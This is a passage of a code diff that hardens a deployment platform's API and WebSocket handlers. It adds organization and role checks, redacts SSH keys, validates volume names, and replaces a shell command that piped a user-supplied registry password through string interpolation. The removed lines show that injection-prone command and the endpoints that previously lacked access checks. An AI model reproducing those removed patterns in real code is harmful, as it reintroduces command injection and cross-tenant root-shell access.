@@ -51,8 +52,12 @@ export const gitlabRouter = createTRPCRouter({
|
|||||||
});
|
});
|
||||||
}
|
}
|
||||||
}),
|
}),
|
||||||
one: protectedProcedure.input(apiFindOneGitlab).query(async ({ input }) => {
|
one: protectedProcedure
|
||||||
return await findGitlabById(input.gitlabId);
|
.input(apiFindOneGitlab)
|
||||||
|
.query(async ({ input, ctx }) => {
|
||||||
|
const gitlab = await findGitlabById(input.gitlabId);
|
||||||
|
await assertGitProviderAccess(ctx.session, gitlab.gitProvider);
|
||||||
|
return gitlab;
|
||||||
}),
|
}),
|
||||||
gitlabProviders: protectedProcedure.query(async ({ ctx }) => {
|
gitlabProviders: protectedProcedure.query(async ({ ctx }) => {
|
||||||
const accessibleIds = await getAccessibleGitProviderIds(ctx.session);
|
const accessibleIds = await getAccessibleGitProviderIds(ctx.session);
|
||||||
@@ -86,19 +91,27 @@ export const gitlabRouter = createTRPCRouter({
|
|||||||
}),
|
}),
|
||||||
getGitlabRepositories: protectedProcedure
|
getGitlabRepositories: protectedProcedure
|
||||||
.input(apiFindOneGitlab)
|
.input(apiFindOneGitlab)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
const gitlab = await findGitlabById(input.gitlabId);
|
||||||
|
await assertGitProviderAccess(ctx.session, gitlab.gitProvider);
|
||||||
return await getGitlabRepositories(input.gitlabId);
|
return await getGitlabRepositories(input.gitlabId);
|
||||||
}),
|
}),
|
||||||
|
|
||||||
getGitlabBranches: protectedProcedure
|
getGitlabBranches: protectedProcedure
|
||||||
.input(apiFindGitlabBranches)
|
.input(apiFindGitlabBranches)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
if (input.gitlabId) {
|
||||||
|
const gitlab = await findGitlabById(input.gitlabId);
|
||||||
|
await assertGitProviderAccess(ctx.session, gitlab.gitProvider);
|
||||||
|
}
|
||||||
return await getGitlabBranches(input);
|
return await getGitlabBranches(input);
|
||||||
}),
|
}),
|
||||||
testConnection: protectedProcedure
|
testConnection: protectedProcedure
|
||||||
.input(apiGitlabTestConnection)
|
.input(apiGitlabTestConnection)
|
||||||
.mutation(async ({ input }) => {
|
.mutation(async ({ input, ctx }) => {
|
||||||
try {
|
try {
|
||||||
|
const gitlab = await findGitlabById(input.gitlabId);
|
||||||
|
await assertGitProviderAccess(ctx.session, gitlab.gitProvider);
|
||||||
const result = await testGitlabConnection(input);
|
const result = await testGitlabConnection(input);
|
||||||
|
|
||||||
return `Found ${result} repositories`;
|
return `Found ${result} repositories`;
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ import {
|
|||||||
findRegistryById,
|
findRegistryById,
|
||||||
IS_CLOUD,
|
IS_CLOUD,
|
||||||
removeRegistry,
|
removeRegistry,
|
||||||
|
safeDockerLoginCommand,
|
||||||
updateRegistry,
|
updateRegistry,
|
||||||
} from "@dokploy/server";
|
} from "@dokploy/server";
|
||||||
import { db } from "@dokploy/server/db";
|
import { db } from "@dokploy/server/db";
|
||||||
@@ -122,7 +123,11 @@ export const registryRouter = createTRPCRouter({
|
|||||||
if (input.serverId && input.serverId !== "none") {
|
if (input.serverId && input.serverId !== "none") {
|
||||||
await execAsyncRemote(
|
await execAsyncRemote(
|
||||||
input.serverId,
|
input.serverId,
|
||||||
`echo ${input.password} | docker ${args.join(" ")}`,
|
safeDockerLoginCommand(
|
||||||
|
input.registryUrl,
|
||||||
|
input.username,
|
||||||
|
input.password,
|
||||||
|
),
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
await execFileAsync("docker", args, {
|
await execFileAsync("docker", args, {
|
||||||
@@ -182,7 +187,11 @@ export const registryRouter = createTRPCRouter({
|
|||||||
if (input.serverId && input.serverId !== "none") {
|
if (input.serverId && input.serverId !== "none") {
|
||||||
await execAsyncRemote(
|
await execAsyncRemote(
|
||||||
input.serverId,
|
input.serverId,
|
||||||
`echo ${registryData.password} | docker ${args.join(" ")}`,
|
safeDockerLoginCommand(
|
||||||
|
registryData.registryUrl,
|
||||||
|
registryData.username,
|
||||||
|
registryData.password,
|
||||||
|
),
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
await execFileAsync("docker", args, {
|
await execFileAsync("docker", args, {
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ import {
|
|||||||
findMemberByUserId,
|
findMemberByUserId,
|
||||||
} from "@dokploy/server/services/permission";
|
} from "@dokploy/server/services/permission";
|
||||||
import {
|
import {
|
||||||
|
assertHostScheduleAccess,
|
||||||
createSchedule,
|
createSchedule,
|
||||||
deleteSchedule,
|
deleteSchedule,
|
||||||
findScheduleById,
|
findScheduleById,
|
||||||
@@ -31,6 +32,8 @@ export const scheduleRouter = createTRPCRouter({
|
|||||||
create: protectedProcedure
|
create: protectedProcedure
|
||||||
.input(createScheduleSchema)
|
.input(createScheduleSchema)
|
||||||
.mutation(async ({ input, ctx }) => {
|
.mutation(async ({ input, ctx }) => {
|
||||||
|
await assertHostScheduleAccess(ctx, input.scheduleType, input.serverId);
|
||||||
|
|
||||||
const serviceId = input.applicationId || input.composeId;
|
const serviceId = input.applicationId || input.composeId;
|
||||||
if (serviceId) {
|
if (serviceId) {
|
||||||
await checkServicePermissionAndAccess(ctx, serviceId, {
|
await checkServicePermissionAndAccess(ctx, serviceId, {
|
||||||
@@ -44,45 +47,9 @@ export const scheduleRouter = createTRPCRouter({
|
|||||||
);
|
);
|
||||||
}
|
}
|
||||||
} else {
|
} else {
|
||||||
if (input.scheduleType === "dokploy-server" && IS_CLOUD) {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "FORBIDDEN",
|
|
||||||
message:
|
|
||||||
"Host-level schedules are not available in the cloud version.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
await checkPermission(ctx, { schedule: ["create"] });
|
await checkPermission(ctx, { schedule: ["create"] });
|
||||||
|
|
||||||
if (
|
if (IS_CLOUD && input.scheduleType === "server" && input.serverId) {
|
||||||
input.scheduleType === "server" ||
|
|
||||||
input.scheduleType === "dokploy-server"
|
|
||||||
) {
|
|
||||||
const member = await findMemberByUserId(
|
|
||||||
ctx.user.id,
|
|
||||||
ctx.session.activeOrganizationId,
|
|
||||||
);
|
|
||||||
if (member.role !== "owner" && member.role !== "admin") {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "FORBIDDEN",
|
|
||||||
message:
|
|
||||||
"Only owners and admins can manage server-level schedules.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
if (input.scheduleType === "server" && input.serverId) {
|
|
||||||
const targetServer = await findServerById(input.serverId);
|
|
||||||
if (
|
|
||||||
targetServer.organizationId !== ctx.session.activeOrganizationId
|
|
||||||
) {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "UNAUTHORIZED",
|
|
||||||
message: "You don't have access to this server.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
if (IS_CLOUD) {
|
|
||||||
await assertScheduledJobLimit(
|
await assertScheduledJobLimit(
|
||||||
ctx.session.activeOrganizationId,
|
ctx.session.activeOrganizationId,
|
||||||
"server",
|
"server",
|
||||||
@@ -90,7 +57,6 @@ export const scheduleRouter = createTRPCRouter({
|
|||||||
);
|
);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
|
||||||
const newSchedule = await createSchedule({
|
const newSchedule = await createSchedule({
|
||||||
...input,
|
...input,
|
||||||
...(input.scheduleType === "dokploy-server" && {
|
...(input.scheduleType === "dokploy-server" && {
|
||||||
@@ -135,6 +101,22 @@ export const scheduleRouter = createTRPCRouter({
|
|||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
|
await assertHostScheduleAccess(
|
||||||
|
ctx,
|
||||||
|
existingSchedule.scheduleType,
|
||||||
|
existingSchedule.serverId,
|
||||||
|
);
|
||||||
|
if (
|
||||||
|
input.scheduleType &&
|
||||||
|
input.scheduleType !== existingSchedule.scheduleType
|
||||||
|
) {
|
||||||
|
await assertHostScheduleAccess(
|
||||||
|
ctx,
|
||||||
|
input.scheduleType,
|
||||||
|
input.serverId ?? existingSchedule.serverId,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
const serviceId =
|
const serviceId =
|
||||||
existingSchedule.applicationId || existingSchedule.composeId;
|
existingSchedule.applicationId || existingSchedule.composeId;
|
||||||
if (serviceId) {
|
if (serviceId) {
|
||||||
@@ -142,47 +124,7 @@ export const scheduleRouter = createTRPCRouter({
|
|||||||
schedule: ["update"],
|
schedule: ["update"],
|
||||||
});
|
});
|
||||||
} else {
|
} else {
|
||||||
if (existingSchedule.scheduleType === "dokploy-server" && IS_CLOUD) {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "FORBIDDEN",
|
|
||||||
message:
|
|
||||||
"Host-level schedules are not available in the cloud version.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
await checkPermission(ctx, { schedule: ["update"] });
|
await checkPermission(ctx, { schedule: ["update"] });
|
||||||
|
|
||||||
if (
|
|
||||||
existingSchedule.scheduleType === "server" ||
|
|
||||||
existingSchedule.scheduleType === "dokploy-server"
|
|
||||||
) {
|
|
||||||
const member = await findMemberByUserId(
|
|
||||||
ctx.user.id,
|
|
||||||
ctx.session.activeOrganizationId,
|
|
||||||
);
|
|
||||||
if (member.role !== "owner" && member.role !== "admin") {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "FORBIDDEN",
|
|
||||||
message:
|
|
||||||
"Only owners and admins can manage server-level schedules.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
if (
|
|
||||||
existingSchedule.scheduleType === "server" &&
|
|
||||||
existingSchedule.serverId
|
|
||||||
) {
|
|
||||||
const targetServer = await findServerById(existingSchedule.serverId);
|
|
||||||
if (
|
|
||||||
targetServer.organizationId !== ctx.session.activeOrganizationId
|
|
||||||
) {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "UNAUTHORIZED",
|
|
||||||
message: "You don't have access to this server.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
const updatedSchedule = await updateSchedule(input);
|
const updatedSchedule = await updateSchedule(input);
|
||||||
|
|
||||||
@@ -222,50 +164,19 @@ export const scheduleRouter = createTRPCRouter({
|
|||||||
.input(z.object({ scheduleId: z.string() }))
|
.input(z.object({ scheduleId: z.string() }))
|
||||||
.mutation(async ({ input, ctx }) => {
|
.mutation(async ({ input, ctx }) => {
|
||||||
const scheduleItem = await findScheduleById(input.scheduleId);
|
const scheduleItem = await findScheduleById(input.scheduleId);
|
||||||
|
await assertHostScheduleAccess(
|
||||||
|
ctx,
|
||||||
|
scheduleItem.scheduleType,
|
||||||
|
scheduleItem.serverId,
|
||||||
|
);
|
||||||
|
|
||||||
const serviceId = scheduleItem.applicationId || scheduleItem.composeId;
|
const serviceId = scheduleItem.applicationId || scheduleItem.composeId;
|
||||||
if (serviceId) {
|
if (serviceId) {
|
||||||
await checkServicePermissionAndAccess(ctx, serviceId, {
|
await checkServicePermissionAndAccess(ctx, serviceId, {
|
||||||
schedule: ["delete"],
|
schedule: ["delete"],
|
||||||
});
|
});
|
||||||
} else {
|
} else {
|
||||||
if (scheduleItem.scheduleType === "dokploy-server" && IS_CLOUD) {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "FORBIDDEN",
|
|
||||||
message:
|
|
||||||
"Host-level schedules are not available in the cloud version.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
await checkPermission(ctx, { schedule: ["delete"] });
|
await checkPermission(ctx, { schedule: ["delete"] });
|
||||||
|
|
||||||
if (
|
|
||||||
scheduleItem.scheduleType === "server" ||
|
|
||||||
scheduleItem.scheduleType === "dokploy-server"
|
|
||||||
) {
|
|
||||||
const member = await findMemberByUserId(
|
|
||||||
ctx.user.id,
|
|
||||||
ctx.session.activeOrganizationId,
|
|
||||||
);
|
|
||||||
if (member.role !== "owner" && member.role !== "admin") {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "FORBIDDEN",
|
|
||||||
message:
|
|
||||||
"Only owners and admins can manage server-level schedules.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
if (scheduleItem.scheduleType === "server" && scheduleItem.serverId) {
|
|
||||||
const targetServer = await findServerById(scheduleItem.serverId);
|
|
||||||
if (
|
|
||||||
targetServer.organizationId !== ctx.session.activeOrganizationId
|
|
||||||
) {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "UNAUTHORIZED",
|
|
||||||
message: "You don't have access to this server.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
await deleteSchedule(input.scheduleId);
|
await deleteSchedule(input.scheduleId);
|
||||||
|
|
||||||
@@ -389,50 +300,19 @@ export const scheduleRouter = createTRPCRouter({
|
|||||||
.input(z.object({ scheduleId: z.string().min(1) }))
|
.input(z.object({ scheduleId: z.string().min(1) }))
|
||||||
.mutation(async ({ input, ctx }) => {
|
.mutation(async ({ input, ctx }) => {
|
||||||
const scheduleItem = await findScheduleById(input.scheduleId);
|
const scheduleItem = await findScheduleById(input.scheduleId);
|
||||||
|
await assertHostScheduleAccess(
|
||||||
|
ctx,
|
||||||
|
scheduleItem.scheduleType,
|
||||||
|
scheduleItem.serverId,
|
||||||
|
);
|
||||||
|
|
||||||
const serviceId = scheduleItem.applicationId || scheduleItem.composeId;
|
const serviceId = scheduleItem.applicationId || scheduleItem.composeId;
|
||||||
if (serviceId) {
|
if (serviceId) {
|
||||||
await checkServicePermissionAndAccess(ctx, serviceId, {
|
await checkServicePermissionAndAccess(ctx, serviceId, {
|
||||||
schedule: ["create"],
|
schedule: ["create"],
|
||||||
});
|
});
|
||||||
} else {
|
} else {
|
||||||
if (scheduleItem.scheduleType === "dokploy-server" && IS_CLOUD) {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "FORBIDDEN",
|
|
||||||
message:
|
|
||||||
"Host-level schedules are not available in the cloud version.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
await checkPermission(ctx, { schedule: ["create"] });
|
await checkPermission(ctx, { schedule: ["create"] });
|
||||||
|
|
||||||
if (
|
|
||||||
scheduleItem.scheduleType === "server" ||
|
|
||||||
scheduleItem.scheduleType === "dokploy-server"
|
|
||||||
) {
|
|
||||||
const member = await findMemberByUserId(
|
|
||||||
ctx.user.id,
|
|
||||||
ctx.session.activeOrganizationId,
|
|
||||||
);
|
|
||||||
if (member.role !== "owner" && member.role !== "admin") {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "FORBIDDEN",
|
|
||||||
message:
|
|
||||||
"Only owners and admins can manage server-level schedules.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
if (scheduleItem.scheduleType === "server" && scheduleItem.serverId) {
|
|
||||||
const targetServer = await findServerById(scheduleItem.serverId);
|
|
||||||
if (
|
|
||||||
targetServer.organizationId !== ctx.session.activeOrganizationId
|
|
||||||
) {
|
|
||||||
throw new TRPCError({
|
|
||||||
code: "UNAUTHORIZED",
|
|
||||||
message: "You don't have access to this server.",
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
try {
|
try {
|
||||||
await runCommand(input.scheduleId);
|
await runCommand(input.scheduleId);
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ import {
|
|||||||
getPublicIpWithFallback,
|
getPublicIpWithFallback,
|
||||||
haveActiveServices,
|
haveActiveServices,
|
||||||
IS_CLOUD,
|
IS_CLOUD,
|
||||||
|
redactServerSshKey,
|
||||||
removeDeploymentsByServerId,
|
removeDeploymentsByServerId,
|
||||||
serverAudit,
|
serverAudit,
|
||||||
serverSetup,
|
serverSetup,
|
||||||
@@ -105,7 +106,7 @@ export const serverRouter = createTRPCRouter({
|
|||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
return server;
|
return redactServerSshKey(server);
|
||||||
}),
|
}),
|
||||||
getDefaultCommand: withPermission("server", "read")
|
getDefaultCommand: withPermission("server", "read")
|
||||||
.input(apiFindOneServer)
|
.input(apiFindOneServer)
|
||||||
@@ -412,6 +413,14 @@ export const serverRouter = createTRPCRouter({
|
|||||||
.input(apiRemoveServer)
|
.input(apiRemoveServer)
|
||||||
.mutation(async ({ input, ctx }) => {
|
.mutation(async ({ input, ctx }) => {
|
||||||
try {
|
try {
|
||||||
|
const currentServer = await findServerById(input.serverId);
|
||||||
|
if (currentServer.organizationId !== ctx.session.activeOrganizationId) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "UNAUTHORIZED",
|
||||||
|
message: "You are not authorized to delete this server",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
const activeServers = await haveActiveServices(input.serverId);
|
const activeServers = await haveActiveServices(input.serverId);
|
||||||
|
|
||||||
if (activeServers) {
|
if (activeServers) {
|
||||||
@@ -420,7 +429,6 @@ export const serverRouter = createTRPCRouter({
|
|||||||
message: "Server has active services, please delete them first",
|
message: "Server has active services, please delete them first",
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
const currentServer = await findServerById(input.serverId);
|
|
||||||
await audit(ctx, {
|
await audit(ctx, {
|
||||||
action: "delete",
|
action: "delete",
|
||||||
resourceType: "server",
|
resourceType: "server",
|
||||||
@@ -436,7 +444,7 @@ export const serverRouter = createTRPCRouter({
|
|||||||
await updateServersBasedOnQuantity(admin.id, admin.serversQuantity);
|
await updateServersBasedOnQuantity(admin.id, admin.serversQuantity);
|
||||||
}
|
}
|
||||||
|
|
||||||
return currentServer;
|
return redactServerSshKey(currentServer);
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
throw error;
|
throw error;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -18,12 +18,30 @@ export const swarmRouter = createTRPCRouter({
|
|||||||
serverId: z.string().optional(),
|
serverId: z.string().optional(),
|
||||||
}),
|
}),
|
||||||
)
|
)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
if (input.serverId) {
|
||||||
|
const server = await findServerById(input.serverId);
|
||||||
|
if (server.organizationId !== ctx.session?.activeOrganizationId) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "UNAUTHORIZED",
|
||||||
|
message: "You are not authorized to access this server",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
return await getSwarmNodes(input.serverId);
|
return await getSwarmNodes(input.serverId);
|
||||||
}),
|
}),
|
||||||
getNodeInfo: withPermission("server", "read")
|
getNodeInfo: withPermission("server", "read")
|
||||||
.input(z.object({ nodeId: z.string(), serverId: z.string().optional() }))
|
.input(z.object({ nodeId: z.string(), serverId: z.string().optional() }))
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
if (input.serverId) {
|
||||||
|
const server = await findServerById(input.serverId);
|
||||||
|
if (server.organizationId !== ctx.session?.activeOrganizationId) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "UNAUTHORIZED",
|
||||||
|
message: "You are not authorized to access this server",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
return await getNodeInfo(input.nodeId, input.serverId);
|
return await getNodeInfo(input.nodeId, input.serverId);
|
||||||
}),
|
}),
|
||||||
getNodeApps: withPermission("server", "read")
|
getNodeApps: withPermission("server", "read")
|
||||||
@@ -32,7 +50,16 @@ export const swarmRouter = createTRPCRouter({
|
|||||||
serverId: z.string().optional(),
|
serverId: z.string().optional(),
|
||||||
}),
|
}),
|
||||||
)
|
)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
if (input.serverId) {
|
||||||
|
const server = await findServerById(input.serverId);
|
||||||
|
if (server.organizationId !== ctx.session?.activeOrganizationId) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "UNAUTHORIZED",
|
||||||
|
message: "You are not authorized to access this server",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
return getNodeApplications(input.serverId);
|
return getNodeApplications(input.serverId);
|
||||||
}),
|
}),
|
||||||
getAppInfos: withPermission("server", "read")
|
getAppInfos: withPermission("server", "read")
|
||||||
@@ -54,7 +81,16 @@ export const swarmRouter = createTRPCRouter({
|
|||||||
serverId: z.string().optional(),
|
serverId: z.string().optional(),
|
||||||
}),
|
}),
|
||||||
)
|
)
|
||||||
.query(async ({ input }) => {
|
.query(async ({ input, ctx }) => {
|
||||||
|
if (input.serverId) {
|
||||||
|
const server = await findServerById(input.serverId);
|
||||||
|
if (server.organizationId !== ctx.session?.activeOrganizationId) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "UNAUTHORIZED",
|
||||||
|
message: "You are not authorized to access this server",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
return await getApplicationInfo(input.appName, input.serverId);
|
return await getApplicationInfo(input.appName, input.serverId);
|
||||||
}),
|
}),
|
||||||
getContainerStats: withPermission("server", "read")
|
getContainerStats: withPermission("server", "read")
|
||||||
|
|||||||
@@ -13,6 +13,8 @@ import { db } from "@dokploy/server/db";
|
|||||||
import {
|
import {
|
||||||
createVolumeBackupSchema,
|
createVolumeBackupSchema,
|
||||||
updateVolumeBackupSchema,
|
updateVolumeBackupSchema,
|
||||||
|
VOLUME_NAME_MESSAGE,
|
||||||
|
VOLUME_NAME_REGEX,
|
||||||
volumeBackups,
|
volumeBackups,
|
||||||
} from "@dokploy/server/db/schema";
|
} from "@dokploy/server/db/schema";
|
||||||
import { findDestinationById } from "@dokploy/server/services/destination";
|
import { findDestinationById } from "@dokploy/server/services/destination";
|
||||||
@@ -275,7 +277,10 @@ export const volumeBackupsRouter = createTRPCRouter({
|
|||||||
z.object({
|
z.object({
|
||||||
backupFileName: z.string().min(1),
|
backupFileName: z.string().min(1),
|
||||||
destinationId: z.string().min(1),
|
destinationId: z.string().min(1),
|
||||||
volumeName: z.string().min(1),
|
volumeName: z
|
||||||
|
.string()
|
||||||
|
.min(1)
|
||||||
|
.regex(VOLUME_NAME_REGEX, VOLUME_NAME_MESSAGE),
|
||||||
id: z.string().min(1),
|
id: z.string().min(1),
|
||||||
serviceType: z.enum(["application", "compose"]),
|
serviceType: z.enum(["application", "compose"]),
|
||||||
serverId: z.string().optional(),
|
serverId: z.string().optional(),
|
||||||
|
|||||||
89
apps/dokploy/server/wss/authorize.ts
Normal file
89
apps/dokploy/server/wss/authorize.ts
Normal file
@@ -0,0 +1,89 @@
|
|||||||
|
import { getAccessibleServerIds } from "@dokploy/server";
|
||||||
|
import {
|
||||||
|
checkServiceAccess,
|
||||||
|
findMemberByUserId,
|
||||||
|
hasPermission,
|
||||||
|
} from "@dokploy/server/services/permission";
|
||||||
|
|
||||||
|
type WssUser = { id: string } | null | undefined;
|
||||||
|
type WssSession = { activeOrganizationId?: string | null } | null | undefined;
|
||||||
|
|
||||||
|
const buildCtx = (user: { id: string }, activeOrganizationId: string) => ({
|
||||||
|
user: { id: user.id },
|
||||||
|
session: { activeOrganizationId },
|
||||||
|
});
|
||||||
|
|
||||||
|
// Authorizes docker/container operations opened over a WebSocket (container
|
||||||
|
// terminal, container logs, container stats). Requires the docker permission
|
||||||
|
// (owner/admin, or a member explicitly granted canAccessToDocker) and, for a
|
||||||
|
// remote server, that the server is accessible to the caller. Previously these
|
||||||
|
// handlers only checked session + organization, so any member could reach a
|
||||||
|
// root shell / logs of any container.
|
||||||
|
export const canAccessDockerOverWss = async (
|
||||||
|
user: WssUser,
|
||||||
|
session: WssSession,
|
||||||
|
serverId?: string | null,
|
||||||
|
serviceId?: string | null,
|
||||||
|
): Promise<boolean> => {
|
||||||
|
if (!user || !session?.activeOrganizationId) return false;
|
||||||
|
|
||||||
|
const ctx = buildCtx(user, session.activeOrganizationId);
|
||||||
|
|
||||||
|
// When the container belongs to a specific Dokploy service (opened from a
|
||||||
|
// service page, so serviceId is present), access to that service is the
|
||||||
|
// authoritative gate — matching the service tRPC endpoints (e.g.
|
||||||
|
// application.readLogs, which check service access only). A member granted
|
||||||
|
// the service can read its logs / open its terminal even without the broad
|
||||||
|
// "docker" permission or explicit access to the server it runs on.
|
||||||
|
if (serviceId) {
|
||||||
|
try {
|
||||||
|
await checkServiceAccess(ctx, serviceId, "read");
|
||||||
|
return true;
|
||||||
|
} catch {
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Generic Docker overview (no service context): mirror the docker tRPC router
|
||||||
|
// — require the docker permission and access to the target server.
|
||||||
|
if (!(await hasPermission(ctx, { docker: ["read"] }))) return false;
|
||||||
|
|
||||||
|
if (serverId && serverId !== "local") {
|
||||||
|
const accessible = await getAccessibleServerIds({
|
||||||
|
userId: user.id,
|
||||||
|
activeOrganizationId: session.activeOrganizationId,
|
||||||
|
});
|
||||||
|
if (!accessible.has(serverId)) return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
return true;
|
||||||
|
};
|
||||||
|
|
||||||
|
// Authorizes the host/server SSH terminal opened over a WebSocket. The local
|
||||||
|
// host terminal is a root shell on the control-plane host, so it is restricted
|
||||||
|
// to owner/admin. A remote server terminal is gated on server access.
|
||||||
|
export const canAccessTerminalOverWss = async (
|
||||||
|
user: WssUser,
|
||||||
|
session: WssSession,
|
||||||
|
serverId?: string | null,
|
||||||
|
): Promise<boolean> => {
|
||||||
|
if (!user || !session?.activeOrganizationId) return false;
|
||||||
|
|
||||||
|
if (serverId && serverId !== "local") {
|
||||||
|
const accessible = await getAccessibleServerIds({
|
||||||
|
userId: user.id,
|
||||||
|
activeOrganizationId: session.activeOrganizationId,
|
||||||
|
});
|
||||||
|
return accessible.has(serverId);
|
||||||
|
}
|
||||||
|
|
||||||
|
try {
|
||||||
|
const member = await findMemberByUserId(
|
||||||
|
user.id,
|
||||||
|
session.activeOrganizationId,
|
||||||
|
);
|
||||||
|
return member?.role === "owner" || member?.role === "admin";
|
||||||
|
} catch {
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
};
|
||||||
@@ -3,6 +3,7 @@ import { findServerById, IS_CLOUD, validateRequest } from "@dokploy/server";
|
|||||||
import { spawn } from "node-pty";
|
import { spawn } from "node-pty";
|
||||||
import { Client } from "ssh2";
|
import { Client } from "ssh2";
|
||||||
import { WebSocketServer } from "ws";
|
import { WebSocketServer } from "ws";
|
||||||
|
import { canAccessDockerOverWss } from "./authorize";
|
||||||
import {
|
import {
|
||||||
getShell,
|
getShell,
|
||||||
isValidContainerId,
|
isValidContainerId,
|
||||||
@@ -41,6 +42,7 @@ export const setupDockerContainerLogsWebSocketServer = (
|
|||||||
const since = url.searchParams.get("since") ?? "all";
|
const since = url.searchParams.get("since") ?? "all";
|
||||||
const serverId = url.searchParams.get("serverId");
|
const serverId = url.searchParams.get("serverId");
|
||||||
const runType = url.searchParams.get("runType");
|
const runType = url.searchParams.get("runType");
|
||||||
|
const serviceId = url.searchParams.get("serviceId");
|
||||||
const { user, session } = await validateRequest(req);
|
const { user, session } = await validateRequest(req);
|
||||||
|
|
||||||
if (!containerId) {
|
if (!containerId) {
|
||||||
@@ -74,6 +76,11 @@ export const setupDockerContainerLogsWebSocketServer = (
|
|||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (!(await canAccessDockerOverWss(user, session, serverId, serviceId))) {
|
||||||
|
ws.close(4003, "Not authorized");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
// Set up keep-alive ping mechanism to prevent timeout
|
// Set up keep-alive ping mechanism to prevent timeout
|
||||||
// Send ping every 45 seconds to keep connection alive
|
// Send ping every 45 seconds to keep connection alive
|
||||||
const pingInterval = setInterval(() => {
|
const pingInterval = setInterval(() => {
|
||||||
|
|||||||
@@ -3,6 +3,7 @@ import { findServerById, IS_CLOUD, validateRequest } from "@dokploy/server";
|
|||||||
import { spawn } from "node-pty";
|
import { spawn } from "node-pty";
|
||||||
import { Client } from "ssh2";
|
import { Client } from "ssh2";
|
||||||
import { WebSocketServer } from "ws";
|
import { WebSocketServer } from "ws";
|
||||||
|
import { canAccessDockerOverWss } from "./authorize";
|
||||||
import { isValidContainerId, isValidShell } from "./utils";
|
import { isValidContainerId, isValidShell } from "./utils";
|
||||||
|
|
||||||
export const setupDockerContainerTerminalWebSocketServer = (
|
export const setupDockerContainerTerminalWebSocketServer = (
|
||||||
@@ -32,6 +33,7 @@ export const setupDockerContainerTerminalWebSocketServer = (
|
|||||||
const containerId = url.searchParams.get("containerId");
|
const containerId = url.searchParams.get("containerId");
|
||||||
const activeWay = url.searchParams.get("activeWay");
|
const activeWay = url.searchParams.get("activeWay");
|
||||||
const serverId = url.searchParams.get("serverId");
|
const serverId = url.searchParams.get("serverId");
|
||||||
|
const serviceId = url.searchParams.get("serviceId");
|
||||||
const { user, session } = await validateRequest(req);
|
const { user, session } = await validateRequest(req);
|
||||||
|
|
||||||
if (!containerId) {
|
if (!containerId) {
|
||||||
@@ -58,6 +60,11 @@ export const setupDockerContainerTerminalWebSocketServer = (
|
|||||||
ws.close();
|
ws.close();
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (!(await canAccessDockerOverWss(user, session, serverId, serviceId))) {
|
||||||
|
ws.close(4003, "Not authorized");
|
||||||
|
return;
|
||||||
|
}
|
||||||
try {
|
try {
|
||||||
if (serverId) {
|
if (serverId) {
|
||||||
const server = await findServerById(serverId);
|
const server = await findServerById(serverId);
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ import {
|
|||||||
validateRequest,
|
validateRequest,
|
||||||
} from "@dokploy/server";
|
} from "@dokploy/server";
|
||||||
